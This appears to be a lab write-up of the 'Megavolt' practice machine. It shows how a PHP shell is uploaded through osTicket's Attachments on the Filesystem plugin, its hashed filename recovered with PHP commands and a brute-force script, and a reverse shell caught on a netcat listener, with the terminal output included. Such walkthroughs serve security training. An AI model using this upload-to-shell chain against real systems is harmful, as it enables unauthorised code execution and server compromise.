InfoSec LAB

Megavolt_Exploitation

Created: 2 min read

Attachments on the Filesystem Plugin

After successfully exploiting the CVE-2019-14748 vulnerability to gain access to the admin panel, an installed but disabled plugin named Attachments on the Filesystem was discovered. This plugin is designed to store attachment files directly on the host filesystem in the /var/www/html/attachments directory.

Given that osTicket is built on PHP, there exists a potential security risk where a malicious PHP file could be uploaded as an attachment. If executed, this could allow arbitrary code execution, leading to a possible system compromise.

Enabling the “Attachments on the Filesystem” plugin

According to the official documentation, the Store Attachments attribute has to be manually set.

I will also set the maximum file size to 2mb and uncheck the Login required attribute

Issue

Uploading a PHP shell; shell.php

Checking the /attachments directory reveals a sub-directory, 8, where uploaded files are stored

Unable to access

Workaround

Checking back at the official documentation, it shows that the uploaded files are renamed by what appears to be hashing it

Looking it up online for solution reveals a GitHub repository that contains a Bash script that performs recovering the uploaded filename

Exploitation

Clicking into the uploaded file reveals the key;uvmmvsrur7ax6-nskx__tn9mk6l1dwm4

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/megavolt]
└─$ php -a 
Interactive shell
 
php > $sha1 = base64_encode(sha1_file('/home/kali/PEN-200/PG_PRACTICE/megavolt/shell.php', true));
php > print(str_replace(array('=','+','/'), array('','-','_'), $sha1));
SrUr7AX6-nSkx__Tn9MK6l1dWm4

Then following through the instruction to generate the file key; SrUr7AX6-nSkx__Tn9MK6l1dWm4

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/megavolt]
└─$ ./osticket_upload_shell.sh
 
            ---------------------------------
            -                               -
            -   Osticket guess file path    -
            -                               -
            -       Github:@Und3r-r00t      -
            -                               -
            ---------------------------------
 
[note!]
[*] Attachments on the filesystem
[*] https://docs.osticket.com/en/latest/Plugins/Attachments on the Filesystem.html
 
Target: 192.168.177.115
Url key: uvmmvsrur7ax6-nskx__tn9mk6l1dwm4
File key: SrUr7AX6-nSkx__Tn9MK6l1dWm4
 
[...REDACTED...]

The Bash script brute-forces every possible combination to find the filename by sending GET request with curl It eventually finds it

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/megavolt]
└─$ nnc 80 
listening on [any] 80 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.177.115] 49840
SOCKET: Shell has connected! PID: 3294
whoami
apache
hostname
megavolt
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:d8:91 brd ff:ff:ff:ff:ff:ff
    inet 192.168.177.115/24 brd 192.168.177.255 scope global ens160
       valid_lft forever preferred_lft forever

Initial Foothold established to the target system as the apache account via exploiting a file upload vulnerability in the osTicket version 1.8

Interactive Graph View

Backlinks